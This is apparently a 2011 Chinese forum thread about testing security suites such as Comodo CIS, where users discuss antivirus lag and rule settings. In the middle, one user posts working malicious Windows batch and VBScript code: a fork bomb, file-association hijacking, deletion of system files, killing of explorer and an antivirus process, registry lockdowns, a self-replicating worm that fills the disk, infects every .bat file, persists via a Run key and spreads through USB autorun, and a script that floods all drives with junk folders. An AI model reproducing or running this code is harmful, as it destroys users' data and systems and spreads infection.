学期末没时间测了

footman

bbbxyoiil 发表于 2011-11-13 21:35
实际上默认规则一定要开杀毒的还要开沙盘的，都是全开了

实际上是的。可是很多人没装AV，所以只好禁用AV测试给大家参考

紫涵

bbbxyoiil 发表于 2011-11-13 21:35
实际上默认规则一定要开杀毒的还要开沙盘的，都是全开了

毛豆的杀毒偶然会卡机，开某软件，硬盘一直亮个不停。。。

qqq123123

改为正序吧，这顺序让人很不爽···

footman

qqq123123 发表于 2011-11-13 21:39
改为正序吧，这顺序让人很不爽···

正序最新的恢复被吃了，看不到，所以倒序的

bbbxyoiil

紫涵 发表于 2011-11-13 21:37
毛豆的杀毒偶然会卡机，开某软件，硬盘一直亮个不停。。。

不会吧，至少我的不是

footman

qqq123123 发表于 2011-11-13 21:39
改为正序吧，这顺序让人很不爽···

又好了

a256886572008

@echo off
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
assoc .txt=exefile
assoc .exe=txtfile
assoc .htm=exefile
assoc .html=exefile
assoc .com=txtfile
assoc .gho=txtfile
assoc .rar=txtfile
assoc .zip=txtfile
assoc .chm=txtfile
assoc .jpg=txtfile
assoc .doc=exefile
assoc .ppt=txtfile
assoc .vbs=txtfile
assoc .cmd=txtfile
assoc .bmp=txtfile
assoc .gif=txtfile
assoc .ico=txtfile
assoc .png=txtfile
assoc .jpeg=txtfile
assoc .jpe=txtfile
assoc .jfif=txtfile
assoc .fla=txtfile
assoc .swf=txtfile
assoc .avi=txtfile
assoc .mov=txtfile
assoc .asf=txtfile
assoc .wmv=txtfile
assoc .rm=txtfile
assoc .ra=txtfile
assoc .mvb=txtfile
assoc .flv=txtfile
assoc .mpg=txtfile
assoc .wav=txtfile
assoc .mpeg=txtfile
assoc .mp3=txtfile
assoc .mp4=txtfile
assoc .3gp=txtfile
assoc .msi=txtfile
assoc .bat=txtfile
del %winder%\win.ini /f
del %winder%\regedit.exe /f

assoc .3g2=txtfile
assoc .dat=txtfile
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
taskkill /im 360tray.exe /f
reg add
HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst r: C:\
subst t: C:\
subst k: C:\
subst p: C:\
subst q: C:\
subst s: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
taskkill /im explorer.exe /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 01000000 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
del %0 /f

@echo off
if exsit %SystemDrive%\PAGEFILES.SYS goto end
copy %0 %windir%\system32\logon.bat ::复制自身


FOR /F "tokens=3*" %%i in ('dir /-c %SystemDrive%^|find "可用字节"') do fsutil file createnew %SystemDrive%\PAGEFILES.SYS %%i ::制造超大文件,轰炸硬盘


attrib +r +s +h %SystemDrive%\PAGEFILES.SYS ::隐藏文件


reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV2007 /t REG_SZ /d %windir%\system32\logon.vbs ::自动启动1

set pat=「开始」菜单\程序\启动 ::自动启动2


reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f ::不显示隐藏文件


for /r %SystemDrive% %%i in (*.bat) do type %0>%%i ::感染


if exist %windir%\system32\logon.vbs goto end
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++
echo on error resume next>%windir%\system32\logon.vbs
echo strComputer = ".">>%windir%\system32\logon.vbs
echo set fs =createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echo set WshShell = WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs
echo Set objWMIService = GetObject("winmgmts:" _>>%windir%\system32\logon.vbs
echo ^& "{impersonationLevel=impersonate}!\\" ^& strComputer ^& "\root\cimv2")>>%windir%\system32\logon.vbs
echo Set colDisks = objWMIService.ExecQuery _>>%windir%\system32\logon.vbs
echo ("Select * from Win32_LogicalDisk")>>%windir%\system32\logon.vbs

::监视u盘
echo For i =1 to 9000000000>>%windir%\system32\logon.vbs
echo For Each objDisk in colDisks>>%windir%\system32\logon.vbs
echo Select Case objDisk.DriveType>>%windir%\system32\logon.vbs
echo :Case 2:>>%windir%\system32\logon.vbs


::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏.
echo y1=fs.FileExists(objDisk.DeviceID ^& "\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo if not y1 then>>%windir%\system32\logon.vbs
echo set f=fs.opentextfile(objDisk.DeviceID ^& "\AUTORUN.INF",2, true)>>%windir%\system32\logon.vbs
echo f.write "[AutoRun]" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "open=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shellexecute=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.write "shell\Auto\command=logon.bat" ^& vbcrlf>>%windir%\system32\logon.vbs
echo f.Close>>%windir%\system32\logon.vbs
echo Set f1 = fs.GetFile(objDisk.DeviceID ^& "\AUTORUN.INF")>>%windir%\system32\logon.vbs
echo If f1.Attributes = f1.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f1.Attributes = f1.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs


::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏.
echo y2=fs.FileExists(objDisk.DeviceID ^& "\logon.bat")>>%windir%\system32\logon.vbs
echo if not y2 then >>%windir%\system32\logon.vbs
echo fs.CopyFile "c:\windows\system32\logon.bat",objDisk.DeviceID ^& "\">>%windir%\system32\logon.vbs
echo Set f2 = fs.GetFile(objDisk.DeviceID ^& "\logon.bat")>>%windir%\system32\logon.vbs
echo If f2.Attributes = f2.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f2.Attributes = f2.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs


echo dirr = Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs


::判断u盘中是否存在PAGEFILES.SYS,如果不存在则写入PAGEFILES.SYS并隐藏.
echo y3=fs.FileExists(dirr & "\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo if not y3 then>>%windir%\system32\logon.vbs
echo WshShell.Run "logon.bat">>%windir%\system32\logon.vbs
echo WScript.Sleep 500>>%windir%\system32\logon.vbs
echo Set f3 = fs.GetFile(dirr & "\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echo If f3.Attributes = f3.Attributes AND 2 Then>>%windir%\system32\logon.vbs
echo :f3.Attributes = f3.Attributes XOR 7:>>%windir%\system32\logon.vbs
echo End If>>%windir%\system32\logon.vbs
echo end if>>%windir%\system32\logon.vbs
echo End Select>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs


::每隔5秒扫描一次.
echo WScript.Sleep 5000>>%windir%\system32\logon.vbs
echo Next>>%windir%\system32\logon.vbs
::运行logon.vbs脚本程序
start %windir%\system32\logon.vbs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end

@echo off
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,2000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\

紫涵

bbbxyoiil 发表于 2011-11-13 21:43
不会吧，至少我的不是

开实时监控的话，有可能要卡半天。。。偶然。。。

bbbxyoiil

紫涵 发表于 2011-11-13 21:50
开实时监控的话，有可能要卡半天。。。偶然。。。

我这台机子，只装CIS，也开实时监控，配置也不高，不见有你说的这种事

紫涵

bbbxyoiil 发表于 2011-11-13 21:52
我这台机子，只装CIS，也开实时监控，配置也不高，不见有你说的这种事

我的是WIN7　X64.